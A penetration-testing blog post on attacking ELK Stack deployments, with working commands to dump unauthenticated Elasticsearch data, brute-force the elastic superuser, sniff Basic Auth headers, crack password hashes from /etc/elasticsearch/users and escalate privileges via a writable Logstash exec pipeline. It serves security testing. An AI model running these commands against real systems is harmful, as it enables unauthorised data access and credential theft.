With this blog post, I want to show how to proceed when testing ELK Stack landscapes. Information regarding the exploitation of the ELK Stack is scarce on the internet. Therefore, the following article aims to provide you with some approaches that can be useful during a penetration test.

Disclaimer:

All information below was collected during a research project, and there is no claim to completeness. The guide focuses on ELK Stack deployments on Linux machines. Furthermore, this article does not include information for identifying misconfigurations in a white-box configuration audit.

Background

The ELK Stack consists of three open-source projects: Elasticsearch, Logstash and Kibana. Elasticsearch stores data and provides a fast search engine. Kibana is a graphical interface which allows the analysis and visualization of the data stored in Elasticsearch. Logstash collects data from different sources and saves it to Elasticsearch.

Documentation

The documentation for the ELK Stack is very detailed and can be found on the official Elastic website.

Important Configuration Files

  • Elasticsearch configuration: /etc/elasticsearch/elasticsearch.yml
  • Kibana configuration: /etc/kibana/kibana.yml
  • Logstash configuration: /etc/logstash/logstash.yml
  • Filebeat configuration: /etc/filebeat/filebeat.yml

The configuration files may contain credentials. It is always worth taking a look!

Elasticsearch

Elasticsearch is written in Java. Its REST API runs on port 9200 by default and can be used to store, update, delete or query data. Data is stored as schema-free JSON documents. Each document has a key which identifies it. All documents of the same type are stored in one index, and there can be several indices.
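
For example, the following requests list all indices and retrieve a single document; ELASTICSEARCH-SERVER, <INDEX> and <ID> are placeholders:

# List all indices, including document counts and sizes
curl -X GET "ELASTICSEARCH-SERVER:9200/_cat/indices?v"

# Retrieve a single document by index and key
curl -X GET "ELASTICSEARCH-SERVER:9200/<INDEX>/_doc/<ID>?pretty"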

Authentication disabled?

Authentication is not always enabled by default, so there is a chance that all stored data is accessible.

The first step is to check whether you can get the version:

curl -X GET "ELASTICSEARCH-SERVER:9200/"
{
  "name" : "userver",
  "cluster_name" : "elasticsearch",
  "cluster_uuid" : "lZNH15okQPWfNHp-Aks0OQ",
  "version" : {
    "number" : "7.9.3",
    "build_flavor" : "default",
    "build_type" : "deb",
    "build_hash" : "c4138e51121ef06a6404866cddc601906fe5c868",
    "build_date" : "2020-10-16T10:36:16.141335Z",
    "build_snapshot" : false,
    "lucene_version" : "8.6.2",
    "minimum_wire_compatibility_version" : "6.8.0",
    "minimum_index_compatibility_version" : "6.0.0-beta1"
  },
  "tagline" : "You Know, for Search"
}

If the information above is accessible, authentication is most likely disabled. As a second step, you can verify that authentication is disabled:

curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"
{"error":{"root_cause":[{"type":"exception","reason":"Security must be explicitly enabled when using a [basic] license. Enable security by setting [xpack.security.enabled] to [true] in the elasticsearch.yml file and restart the node."}],"type":"exception","reason":"Security must be explicitly enabled when using a [basic] license. Enable security by setting [xpack.security.enabled] to [true] in the elasticsearch.yml file and restart the node."},"status":500}

In this case authentication is disabled and all data should be accessible. To dump the data, take a look at the API documentation of Elasticsearch [1].
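
As a minimal sketch, after listing the indices as shown above, the _search endpoint can be used to dump documents (<INDEX> is a placeholder):

# Dump up to 1000 documents from an index
curl -X GET "ELASTICSEARCH-SERVER:9200/<INDEX>/_search?size=1000&pretty"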

Authentication enabled?

If the following response is received, authentication is enabled:

curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"
{"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}}],"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}},"status":401}

In this case, the only way to gain access is brute force (a sketch follows the list below). Built-in users are:

  • elastic (This is the superuser! Older versions of Elasticsearch have the default password changeme for this user)
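
A minimal sketch, assuming a local wordlist passwords.txt; the _security/_authenticate endpoint returns HTTP 200 for valid credentials:

# Test the old default password first
curl -u elastic:changeme -X GET "ELASTICSEARCH-SERVER:9200/"

# Simple brute force against the elastic user
while read -r pw; do
  code=$(curl -s -o /dev/null -w "%{http_code}" -u "elastic:$pw" "ELASTICSEARCH-SERVER:9200/_security/_authenticate")
  [ "$code" = "200" ] && echo "[+] Valid password: $pw" && break
done < passwords.txt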

If you are able to retrieve the version although authentication is enabled, anonymous access is configured. The anonymous username is most likely _anonymous.
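
The authenticate endpoint shows which user, including an anonymous one, you are currently acting as:

curl -X GET "ELASTICSEARCH-SERVER:9200/_security/_authenticate?pretty"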

Anonymous access or valid credentials?

If you have anonymous access, valid credentials or an API key, the following requests can be made to gather more information:

  • Using the API key:

    curl -H "Authorization: ApiKey <API-KEY>" ELASTICSEARCH-SERVER:9200/
  • Get more information about the rights of a user:

    curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/<USERNAME>"
  • List all users on the system:

    curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user"
  • List all roles on the system:

    curl -X GET "ELASTICSEARCH-SERVER:9200/_security/role

From here on, you can dump the data accessible to your user.

Enabled SSL/TLS?

If SSL/TLS is not enabled, it should be evaluated whether sensitive information can be leaked. Furthermore, if another service is making authenticated requests to Elasticsearch (e.g. Kibana or Logstash), you can try to capture the traffic and read the Base64-encoded username and password from the Authorization header.
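
A minimal sketch, assuming the traffic passes an interface you can sniff on (eth0 and the Base64 string are placeholders):

# Capture plaintext HTTP traffic to Elasticsearch and filter for Basic Auth headers
tcpdump -i eth0 -A 'tcp port 9200' | grep -i 'Authorization: Basic'

# Decode the captured value into username:password
echo '<BASE64-STRING>' | base64 -d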

Having access to the Elasticsearch machine?

If you have compromised the Elasticsearch machine, also take a look at /etc/elasticsearch/users_roles, which maps roles to users, and /etc/elasticsearch/users, which contains usernames and password hashes if the file realm is used.
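
Since the file realm stores bcrypt hashes, a sketch for cracking them offline with john (the wordlist path is an assumption):

# Extract the hashes (file format: username:hash) and crack them
cut -d: -f2 /etc/elasticsearch/users > hashes.txt
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt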

Kibana

Kibana provides search and data visualization capabilities for data indexed in Elasticsearch. The service runs on port 5601 by default. Kibana also acts as the user interface for monitoring, managing, and securing an Elastic Stack cluster.

Authentication?

Authentication in Kibana is linked to the Elasticsearch credentials. If authentication is disabled in Elasticsearch, Kibana should also be accessible without credentials. Otherwise, credentials valid for Elasticsearch should also work when logging in to Kibana. A user's rights in Kibana are the same as in Elasticsearch.

You might find credentials in the configuration file /etc/kibana/kibana.yml. If those credentials do not belong to the user kibana_system, try to use them for accessing further data. They could have more rights than the kibana_system user, which only has access to the monitoring API and the .kibana index.
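
A quick check for such credentials (elasticsearch.username and elasticsearch.password are the relevant keys):

# Look for Elasticsearch credentials in the Kibana configuration
grep -E "elasticsearch\.(username|password)" /etc/kibana/kibana.yml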

Having Access?

When you have access to Kibana, you can do several things:

  • Try to access data from Elasticsearch
  • Check if you can access the users panel and if you can edit, delete or create new users, roles or API Keys (Stack Management -> Users/Roles/API Keys)
  • Check the current version for vulnerabilities (there was an RCE vulnerability in 2019 for Kibana versions < 6.6.0 [2]); a version check is sketched below
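
A sketch for reading out the version via the Kibana status API (KIBANA-SERVER is a placeholder):

# The status endpoint contains the Kibana version in the "number" field
curl -s "KIBANA-SERVER:5601/api/status" | grep -o '"number":"[^"]*"' | head -n 1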

Enabled SSL/TLS?

If SSL/TLS is not enabled, it should be evaluated whether sensitive information can be leaked.

Logstash

Logstash is the last service of the ELK Stack and is used for collecting, transforming and outputting logs. This is realized with pipelines, which consist of input, filter and output modules. The service gets interesting once you have compromised a machine that runs Logstash as a service.

Any pipelines?

The pipeline configuration file /etc/logstash/pipelines.yml specifies the locations of active pipelines:

# This file is where you define your pipelines. You can define multiple.
# For more information on multiple pipelines, see the documentation:
# https://www.elastic.co/guide/en/logstash/current/multiple-pipelines.html

- pipeline.id: main
  path.config: "/etc/logstash/conf.d/*.conf"
- pipeline.id: example
  path.config: "/usr/share/logstash/pipeline/1*.conf"
  pipeline.workers: 6

In here you can find the paths to the .conf files which contain the configured pipelines. If the Elasticsearch output module is used, pipelines are likely to contain valid credentials for an Elasticsearch instance. Those credentials often have more privileges, since Logstash has to write data to Elasticsearch. If wildcards are used, Logstash tries to run all pipelines located in that folder matching the wildcard.
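
A minimal sketch for hunting such credentials (the paths are taken from the pipelines.yml example above):

# Search all pipeline configurations for credential entries
grep -R -E "user|password" /etc/logstash/conf.d/ /usr/share/logstash/pipeline/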

Privesc with writable pipelines?

Before trying to elevate your own privileges, you should check which user is running the logstash service, since this is the user you will be owning afterwards. Evaluate whether this approach is worth the effort! Per default, the logstash service runs with the privileges of the logstash user.
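
A quick check (process and service names can differ between deployments):

# Determine which user owns the Logstash process
ps aux | grep -i logstash | grep -v grep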

Check whether you have one of the following write permissions:

  • You have write permissions on a pipeline .conf file or
  • /etc/logstash/pipelines.yml contains a wildcard and you are allowed to write into the specified folder

Furthermore, one of the following requirements must be met (both checks are sketched after this list):

  • You are able to restart the logstash service or
  • /etc/logstash/logstash.yml contains the entry config.reload.automatic: true
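
Both conditions can be verified from the shell (paths as listed in pipelines.yml):

# Check write permissions on the pipeline configurations
ls -la /etc/logstash/conf.d/

# Check whether pipeline configurations are reloaded automatically
grep "config.reload.automatic" /etc/logstash/logstash.yml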

If a wildcard is specified, try to create a file matching that wildcard. The following content can be written into the file to execute commands:

input {
  exec {
    command => "whoami"
    interval => 120
  }
}

output {
  file {
    path => "/tmp/output.log"
    codec => rubydebug
  }
}

The interval specifies the time in seconds. In this example the whoami command is executed every 120 seconds. The output of the command is saved into /tmp/output.log.

If /etc/logstash/logstash.yml contains the entry config.reload.automatic: true, you only have to wait until the command gets executed, since Logstash automatically picks up new pipeline configuration files and changes to existing ones. Otherwise, trigger a restart of the logstash service.

If no wildcard is used, you can apply those changes to an existing pipeline configuration. Make sure you do not break things!

Analysis of the configured input sources

Questions for a white-box audit:

  • Is sensitive data loaded via unencrypted channels?
  • Are the input sources properly protected? Can an attacker inject malicious/manipulated log entries?

Black-box pentesting without access to the Logstash configuration:

Cheers,

Gregor

References

[1] https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html
[2] https://github.com/LandGrey/CVE-2019-7609/